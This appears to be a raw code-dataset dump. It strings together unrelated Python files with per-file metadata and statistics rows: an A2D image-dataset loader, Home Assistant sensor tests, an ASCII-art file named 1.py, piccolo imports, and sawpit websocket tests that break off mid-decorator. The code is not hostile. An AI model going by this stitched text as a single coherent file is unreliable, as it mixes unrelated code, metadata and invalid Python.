class_names = np.array([
'background',
'none', 'none', 'none', 'none', 'none', 'none', 'none', 'none', 'none',
'none',
'adult-climbing',
'adult-crawling',
'adult-eating',
'adult-flying',
'adult-jumping',
'adult-rolling',
'adult-running',
'adult-walking',
'adult-none',
'none',
'baby-climbing',
'baby-crawling',
'baby-eating',
'baby-flying',
'baby-jumping',
'baby-rolling',
'baby-running',
'baby-walking',
'baby-none',
'none',
'ball-climbing',
'ball-crawling',
'ball-eating',
'ball-flying',
'ball-jumping',
'ball-rolling',
'ball-running',
'ball-walking',
'ball-none',
'none',
'bird-climbing',
'bird-crawling',
'bird-eating',
'bird-flying',
'bird-jumping',
'bird-rolling',
'bird-running',
'bird-walking',
'bird-none',
'none',
'car-climbing',
'car-crawling',
'car-eating',
'car-flying',
'car-jumping',
'car-rolling',
'car-running',
'car-walking',
'car-none',
'none',
'cat-climbing',
'cat-crawling',
'cat-eating',
'cat-flying',
'cat-jumping',
'cat-rolling',
'cat-running',
'cat-walking',
'cat-none',
'none',
'dog-climbing',
'dog-crawling',
'dog-eating',
'dog-flying',
'dog-jumping',
'dog-rolling',
'dog-running',
'dog-walking',
'dog-none',
])
def __init__(self, config, dataset_path):
super(A2DDataset_test, self).__init__()
with open(
os.path.join(dataset_path,'list',
config.data_list + '.txt')) as f:
self.img_list = []
for line in f:
if line[-1] == '\n':
self.img_list.append(line[:-1])
else:
self.img_list.append(line)
self.img_dir = os.path.join(dataset_path, 'pngs320H')
self.config = config
self.class_names = [A2DDataset.class_names[cls] for cls in A2DDataset.valid_cls]
def __len__(self):
return len(self.img_list)
def __getitem__(self, idx):
vd_frame_idx = self.img_list[idx]
image_path = os.path.join(self.img_dir, vd_frame_idx + '.png')
image = cv2.imread(image_path).astype(np.float32)
image = cv2.resize(image, (224, 224))
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406),
(0.229, 0.224, 0.225))])
image = transform(image)
image = image.contiguous().float()
return image
if __name__ == '__main__':
# train_dataset = A2DDataset(train_cfg)
# val_dataset = A2DDataset(val_cfg)
# load training or validation datasets
train_dataset = A2DDataset(train_cfg, '../A2D')
dataloader = DataLoader(train_dataset, batch_size=4,
shuffle=True, num_workers=4)
for i, data in enumerate(dataloader):
print(data[0].size(), data[1].size())
break
# load test datasets
test_dataset = A2DDataset_test(test_cfg, '../A2D')
dataloader = DataLoader(test_dataset, batch_size=1,
shuffle=False, num_workers=1)
for i, data in enumerate(dataloader):
print(data.size())
break
| 35.065728 | 112 | 0.520083 | 2,040 | 14,938 | 3.686765 | 0.128922 | 0.032442 | 0.037495 | 0.041484 | 0.823029 | 0.790055 | 0.765324 | 0.750432 | 0.740327 | 0.729424 | 0 | 0.164045 | 0.306266 | 14,938 | 425 | 113 | 35.148235 | 0.56171 | 0.064065 | 0 | 0.821138 | 0 | 0 | 0.125108 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01897 | false | 0 | 0.03523 | 0.00542 | 0.149051 | 0.00542 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6f71b749c0a3c50eb1353339b1e450d689b72eb7 | 172 | py | Python | bitcli/core/version.py | jmolinaso/bitcli | 9aa9a5fdc0ff99c14e84564d4c2152f3413656e7 | [
"MIT"
] | null | null | null | bitcli/core/version.py | jmolinaso/bitcli | 9aa9a5fdc0ff99c14e84564d4c2152f3413656e7 | [
"MIT"
] | null | null | null | bitcli/core/version.py | jmolinaso/bitcli | 9aa9a5fdc0ff99c14e84564d4c2152f3413656e7 | [
"MIT"
] | null | null | null |
from cement.utils.version import get_version as cement_get_version
VERSION = (1, 0, 0, 'rc', 0)
def get_version(version=VERSION):
return cement_get_version(version)
| 21.5 | 66 | 0.761628 | 27 | 172 | 4.62963 | 0.444444 | 0.32 | 0.408 | 0.368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 0.139535 | 172 | 7 | 67 | 24.571429 | 0.817568 | 0 | 0 | 0 | 0 | 0 | 0.011696 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
48ab7e1c3f9f7ed7874464cb98aa6e0db87d5f01 | 2,106 | py | Python | tests/components/api_streams/test_sensor.py | pancho-villa/home-assistant | ab17b22239452671f14067571f22aadb9688a3de | [
"Apache-2.0"
] | 1 | 2019-03-21T14:59:31.000Z | 2019-03-21T14:59:31.000Z | tests/components/api_streams/test_sensor.py | pancho-villa/home-assistant | ab17b22239452671f14067571f22aadb9688a3de | [
"Apache-2.0"
] | null | null | null | tests/components/api_streams/test_sensor.py | pancho-villa/home-assistant | ab17b22239452671f14067571f22aadb9688a3de | [
"Apache-2.0"
] | 1 | 2022-02-20T07:41:14.000Z | 2022-02-20T07:41:14.000Z | """Test cases for the API stream sensor."""
import asyncio
import logging
import pytest
from homeassistant.bootstrap import async_setup_component
from tests.common import assert_setup_component
@pytest.mark.skip(reason="test fails randomly due to race condition.")
async def test_api_streams(hass):
"""Test API streams."""
log = logging.getLogger('homeassistant.components.api')
with assert_setup_component(1):
await async_setup_component(hass, 'sensor', {
'sensor': {
'platform': 'api_streams',
}
})
state = hass.states.get('sensor.connected_clients')
assert state.state == '0'
log.debug('STREAM 1 ATTACHED')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '1'
log.debug('STREAM 1 ATTACHED')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '2'
log.debug('STREAM 1 RESPONSE CLOSED')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '1'
@pytest.mark.skip(reason="test fails randomly due to race condition.")
async def test_websocket_api(hass):
"""Test API streams."""
log = logging.getLogger('homeassistant.components.websocket_api')
with assert_setup_component(1):
await async_setup_component(hass, 'sensor', {
'sensor': {
'platform': 'api_streams',
}
})
state = hass.states.get('sensor.connected_clients')
assert state.state == '0'
log.debug('WS %s: %s', id(log), 'Connected')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '1'
log.debug('WS %s: %s', id(log), 'Connected')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '2'
log.debug('WS %s: %s', id(log), 'Closed connection')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '1'
| 27.710526 | 70 | 0.652422 | 269 | 2,106 | 5.007435 | 0.208178 | 0.053452 | 0.089087 | 0.106904 | 0.830735 | 0.830735 | 0.830735 | 0.824053 | 0.824053 | 0.734967 | 0 | 0.015006 | 0.208927 | 2,106 | 75 | 71 | 28.08 | 0.793517 | 0.017569 | 0 | 0.745098 | 0 | 0 | 0.263758 | 0.127913 | 0 | 0 | 0 | 0 | 0.215686 | 1 | 0 | false | 0 | 0.098039 | 0 | 0.098039 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
48b5018ab5b0351f514866f4e20e6bc32bc66e9b | 1,213 | py | Python | LuskiDstat-master - Copy/1.py | Ykluskivps/MY-BOI-NICK-PINGER | 52a7c3bfbc0c5ecbde79078e8f94e158c1fd694c | [
"Apache-2.0"
] | null | null | null | LuskiDstat-master - Copy/1.py | Ykluskivps/MY-BOI-NICK-PINGER | 52a7c3bfbc0c5ecbde79078e8f94e158c1fd694c | [
"Apache-2.0"
] | null | null | null | LuskiDstat-master - Copy/1.py | Ykluskivps/MY-BOI-NICK-PINGER | 52a7c3bfbc0c5ecbde79078e8f94e158c1fd694c | [
"Apache-2.0"
] | null | null | null |
/\ \ /\__ _\ /\ \/\ \/\ \/\ \ /\__ _\ /\ \/\ \
\ \ \ \/_/\ \/ \ \ \_\ \ \ \/'/'\/_/\ \/ \ \ `\\ \
\ \ \ __\ \ \ \ \ _ \ \ , < \ \ \ \ \ , ` \
\ \ \L\ \\_\ \__\ \ \ \ \ \ \\`\ \_\ \__\ \ \`\ \
\ \____//\_____\\ \_\ \_\ \_\ \_\ /\_____\\ \_\ \_\
\/___/ \/_____/ \/_/\/_/\/_/\/_/ \/_____/ \/_/\/_/
__ __ __ ____ _____ ____
/\ \ /\ \/\ \ /\ _`\ /\ __`\/\ _`\
\ `\`\\/'/\ \ \ \ \ \/\ \ \ \/\ \ \ \L\_\
`\ `\ /' \ \ \ __\ \ \ \ \ \ \ \ \ \ \L_L
`\ \ \ \ \ \L\ \\ \ \_\ \ \ \_\ \ \ \/, \
\ \_\ \ \____/ \ \____/\ \_____\ \____/
\/_/ \/___/ \/___/ \/_____/\/___/
| 67.388889 | 96 | 0.102226 | 5 | 1,213 | 1 | 0.2 | 1.6 | 1.8 | 1.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.670239 | 1,213 | 17 | 97 | 71.352941 | 0.0125 | 0 | 0 | 0 | 0 | 0 | 0.000837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5b227a782767345311b6f44bc81543682a0ed785 | 92 | py | Python | piccolo/columns/operators/__init__.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | null | null | null | piccolo/columns/operators/__init__.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | null | null | null | piccolo/columns/operators/__init__.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | null | null | null | from .math import * # noqa
from .string import * # noqa
from .comparison import * # noqa
| 23 | 33 | 0.673913 | 12 | 92 | 5.166667 | 0.5 | 0.483871 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228261 | 92 | 3 | 34 | 30.666667 | 0.873239 | 0.152174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d28ffaaaafdef138bfa4eb07a80a3ea07411aabb | 26,390 | py | Python | tests/test_ws_test.py | jamsidedown/sawpit | 9ef36f10e6deb7f3caab802945afff982abaf986 | [
"MIT"
] | null | null | null | tests/test_ws_test.py | jamsidedown/sawpit | 9ef36f10e6deb7f3caab802945afff982abaf986 | [
"MIT"
] | null | null | null | tests/test_ws_test.py | jamsidedown/sawpit | 9ef36f10e6deb7f3caab802945afff982abaf986 | [
"MIT"
] | null | null | null | import asyncio
import json
import unittest
from unittest.mock import patch, MagicMock
from requests.exceptions import ConnectTimeout
from sawpit import WSTest, WSResponse, WSMessage, WSTimeoutError, RestRequest
def syncify(coro):
    """Decorator that turns a coroutine function into a blocking callable.

    The returned wrapper drives ``coro(*args, **kwargs)`` to completion on a
    fresh event loop via ``asyncio.run`` and returns its result, so async
    test bodies can be invoked by synchronous test runners.

    Uses ``functools.wraps`` so the wrapper keeps the coroutine's
    ``__name__``/``__doc__`` (the original version reported every wrapped
    test as ``wrapper`` in tracebacks and introspection).
    """
    @functools.wraps(coro)
    def wrapper(*args, **kwargs):
        # asyncio.run creates and tears down a new event loop per call.
        return asyncio.run(coro(*args, **kwargs))
    return wrapper
class WSTestTests(unittest.TestCase): # noqa: pylint - too-many-public-methods
def test_create_ws_test_with_uri(self):
ws_tester = WSTest('wss://example.com')
self.assertEqual('wss://example.com', ws_tester.uri)
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_whitespace_is_stripped_from_uri_on_connect(self, mock_ssl, mock_websockets):
ws_tester = WSTest('\n wss://example.com \n')
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
mock_websockets.assert_called_once_with('wss://example.com', ssl=ssl_context)
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_whitespace_is_stripped_from_uri_with_query_parameter_on_connect(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('\n wss://example.com \n')
.with_parameter('\n test \n', '\n example \n')
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
expected_uri = 'wss://example.com?test=example'
mock_websockets.assert_called_once_with(expected_uri, ssl=ssl_context)
mock_socket.close.assert_called_once()
def test_add_key_value_query_parameter(self):
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
)
self.assertEqual(123, ws_tester.parameters['example'])
def test_add_key_value_message(self):
message = WSMessage().with_attribute('test', 123)
ws_tester = (
WSTest('wss://example.com')
.with_message(message)
)
self.assertEqual(1, len(ws_tester.messages))
self.assertEqual(message, ws_tester.messages[0])
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_connect(self, mock_ssl, mock_websockets):
ws_tester = WSTest('wss://example.com')
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
mock_websockets.assert_called_once_with('wss://example.com', ssl=ssl_context)
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@syncify
async def test_websocket_connect_unsecured(self, mock_websockets):
ws_tester = WSTest('ws://example.com')
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
await ws_tester.run()
mock_websockets.assert_called_once_with('ws://example.com')
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_connect_with_parameters(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
.with_parameter('test', 456)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
expected_uri = 'wss://example.com?example=123&test=456'
await ws_tester.run()
mock_websockets.assert_called_once_with(expected_uri, ssl=ssl_context)
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_connect_with_headers(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_header('example', 123)
.with_header('test', 456)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
expected_headers = {
'example': 123,
'test': 456
}
await ws_tester.run()
mock_websockets.assert_called_once_with('wss://example.com', ssl=ssl_context, extra_headers=expected_headers)
mock_socket.close.assert_called_once()
def test_websocket_with_expected_response(self):
response = WSResponse().with_attribute('type')
ws_tester = WSTest('wss://example.com').with_response(response)
self.assertTrue(ws_tester.expected_responses)
self.assertEqual(response, ws_tester.expected_responses[0])
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_receives_and_handles_single_response(self, mock_ssl, mock_websockets):
response = WSResponse().with_attribute('body')
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
.with_response(response)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
response_json = json.dumps({'body': {}})
future = asyncio.Future()
future.set_result(response_json)
mock_socket.recv = MagicMock(side_effect=[future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertEqual(response, ws_tester.received_responses[0])
self.assertEqual(response_json, ws_tester.received_json[0])
self.assertTrue(ws_tester.is_complete())
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_receives_and_handles_multiple_responses(self, mock_ssl, mock_websockets):
first_response = WSResponse().with_attribute('body')
second_response = WSResponse().with_attribute('type')
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
.with_response(first_response)
.with_response(second_response)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
first_future = asyncio.Future()
first_future.set_result(json.dumps({'body': {}}))
second_future = asyncio.Future()
second_future.set_result(json.dumps({'type': {}}))
mock_socket.recv = MagicMock(side_effect=[second_future, first_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertEqual(2, len(ws_tester.received_json))
self.assertEqual(2, len(ws_tester.received_responses))
self.assertTrue(ws_tester.is_complete())
mock_socket.close.assert_called_once()
@syncify
async def test_websocket_receive_when_no_expected_responses(self):
ws_tester = WSTest('wss://example.com')
mock_socket = MagicMock()
await ws_tester._receive_handler(mock_socket, json.dumps({'body': {}})) # noqa: pylint - protected-access
self.assertTrue(ws_tester.received_json)
self.assertFalse(ws_tester.received_responses)
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_response_timeout(self, mock_ssl, mock_websockets):
response = WSResponse().with_attribute('body')
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
.with_response_timeout(0.1)
.with_response(response)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_socket.recv = MagicMock(return_value=asyncio.Future())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
self.assertEqual(ws_tester.response_timeout, 0.1)
with self.assertRaises(WSTimeoutError):
await ws_tester.run()
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_response_timeout_with_received_response_logging_enabled(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_response_timeout(0.1)
.with_received_response_logging()
.with_response(
WSResponse()
.with_attribute('message', 'hello')
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
first_future = asyncio.Future()
first_future.set_result(json.dumps({'message': 'bye'}))
mock_socket.recv = MagicMock(side_effect=[first_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
with self.assertRaises(WSTimeoutError) as ex:
await ws_tester.run()
expected_error = (
'Timed out waiting for responses:\n{"message": "hello"}\n' +
'Received responses:\n{"message": "bye"}'
)
self.assertEqual(expected_error, str(ex.exception))
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_response_timeout_with_received_response_logging_disabled(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_response_timeout(0.1)
.with_response(
WSResponse()
.with_attribute('message', 'hello')
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
first_future = asyncio.Future()
first_future.set_result(json.dumps({'message': 'bye'}))
mock_socket.recv = MagicMock(side_effect=[first_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
with self.assertRaises(WSTimeoutError) as ex:
await ws_tester.run()
expected_error = 'Timed out waiting for responses:\n{"message": "hello"}'
self.assertEqual(expected_error, str(ex.exception))
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_message_timeout(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_message_timeout(0.1)
.with_message(
WSMessage()
.with_attribute('test', 123)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_socket.send = MagicMock(return_value=asyncio.Future())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
self.assertEqual(ws_tester.message_timeout, 0.1)
with self.assertRaises(WSTimeoutError):
await ws_tester.run()
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_test_timeout(self, mock_ssl, mock_websockets):
response = WSResponse().with_attribute('body')
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
.with_test_timeout(0.1)
.with_response(response)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_socket.recv = MagicMock(return_value=asyncio.Future())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
self.assertEqual(ws_tester.test_timeout, 0.1)
with self.assertRaises(WSTimeoutError):
await ws_tester.run()
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_test_send_single_message(self, mock_ssl, mock_websockets):
message = WSMessage().with_attribute('test', 123)
ws_tester = WSTest('wss://example.com').with_message(message)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
future = asyncio.Future()
mock_socket.send = MagicMock(return_value=future)
future.set_result({})
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertFalse(ws_tester.messages)
self.assertEqual(1, len(ws_tester.sent_messages))
mock_socket.send.assert_called_once_with('{"test": 123}')
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_test_receive_response_with_trigger(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_response(
WSResponse()
.with_attribute('type')
.with_trigger(
WSMessage()
.with_attribute('test', 123)
)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
send_future = asyncio.Future()
send_future.set_result({})
mock_socket.send = MagicMock(return_value=send_future)
receive_future = asyncio.Future()
receive_future.set_result(json.dumps({'type': {}}))
mock_socket.recv = MagicMock(side_effect=[receive_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertTrue(ws_tester.is_complete())
mock_socket.send.assert_called_once_with('{"test": 123}')
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_test_receive_response_with_resolved_trigger(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_response(
WSResponse()
.with_attribute('type')
.with_trigger(
WSMessage()
.with_attribute('test', '${type}')
)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
send_future = asyncio.Future()
send_future.set_result({})
mock_socket.send = MagicMock(return_value=send_future)
receive_future = asyncio.Future()
receive_future.set_result(json.dumps({'type': 'Hello, world!'}))
mock_socket.recv = MagicMock(side_effect=[receive_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertTrue(ws_tester.is_complete())
mock_socket.send.assert_called_once_with('{"test": "Hello, world!"}')
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_test_receive_response_with_unresolved_trigger(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_response(
WSResponse()
.with_attribute('type')
.with_trigger(
WSMessage()
.with_attribute('test', '${body}')
)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
send_future = asyncio.Future()
send_future.set_result({})
mock_socket.send = MagicMock(return_value=send_future)
receive_future = asyncio.Future()
receive_future.set_result(json.dumps({'type': 'Hello, world!'}))
mock_socket.recv = MagicMock(side_effect=[receive_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertTrue(ws_tester.is_complete())
mock_socket.send.assert_called_once_with('{"test": "${body}"}')
mock_socket.close.assert_called_once()
@patch('asyncio.sleep')
@patch('websockets.connect')
@syncify
async def test_websocket_sending_message_with_delay(self, mock_websockets, mock_sleep):
ws_tester = (
WSTest('ws://example.com')
.with_message(
WSMessage()
.with_attribute('test', 123)
.with_delay(1)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
send_future = asyncio.Future()
send_future.set_result({})
mock_socket.send = MagicMock(return_value=send_future)
mock_socket.recv = MagicMock(return_value=asyncio.Future())
mock_socket.recv.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
mock_sleep.return_value = asyncio.Future()
mock_sleep.return_value.set_result(None)
await ws_tester.run()
self.assertTrue(ws_tester.is_complete())
mock_socket.send.assert_called_once_with('{"test": 123}')
mock_sleep.assert_called_once_with(1)
mock_socket.close.assert_called_once()
@patch('time.sleep')
@patch('websockets.connect')
@syncify
async def test_websocket_senfing_message_with_no_delay(self, mock_websockets, mock_sleep):
ws_tester = (
WSTest('ws://example.com')
.with_message(
WSMessage()
.with_attribute('test', 123)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
send_future = asyncio.Future()
send_future.set_result({})
mock_socket.send = MagicMock(return_value=send_future)
mock_socket.recv = MagicMock(return_value=asyncio.Future())
mock_socket.recv.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
await ws_tester.run()
self.assertTrue(ws_tester.is_complete())
mock_socket.send.assert_called_once_with('{"test": 123}')
mock_sleep.assert_not_called()
mock_socket.close.assert_called_once()
def test_with_request(self):
request = RestRequest('https://example.com', 'GET')
ws_tester = WSTest('wss://example.com').with_request(request)
self.assertEqual(1, len(ws_tester.requests))
self.assertEqual(request, ws_tester.requests[0])
self.assertFalse(ws_tester.is_complete())
@patch('websockets.connect')
@patch('requests.request')
@syncify
async def test_connect_with_rest_request(self, mock_requests, mock_websockets):
request = RestRequest('https://example.com', 'GET')
ws_tester = WSTest('ws://example.com').with_request(request)
mock_request_response = MagicMock()
mock_request_response.status_code = 'OK'
mock_request_response.json.return_value = {'abc': 123}
mock_requests.return_value = mock_request_response
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
await ws_tester.run()
mock_websockets.assert_called_once_with('ws://example.com')
mock_socket.close.assert_called_once()
mock_requests.assert_called_once_with('get', 'https://example.com', timeout=10.0)
self.assertEqual(1, len(ws_tester.received_request_responses))
self.assertEqual(mock_request_response, ws_tester.received_request_responses[0])
self.assertTrue(ws_tester.is_complete())
@patch('asyncio.sleep')
@patch('websockets.connect')
@patch('requests.request')
@syncify
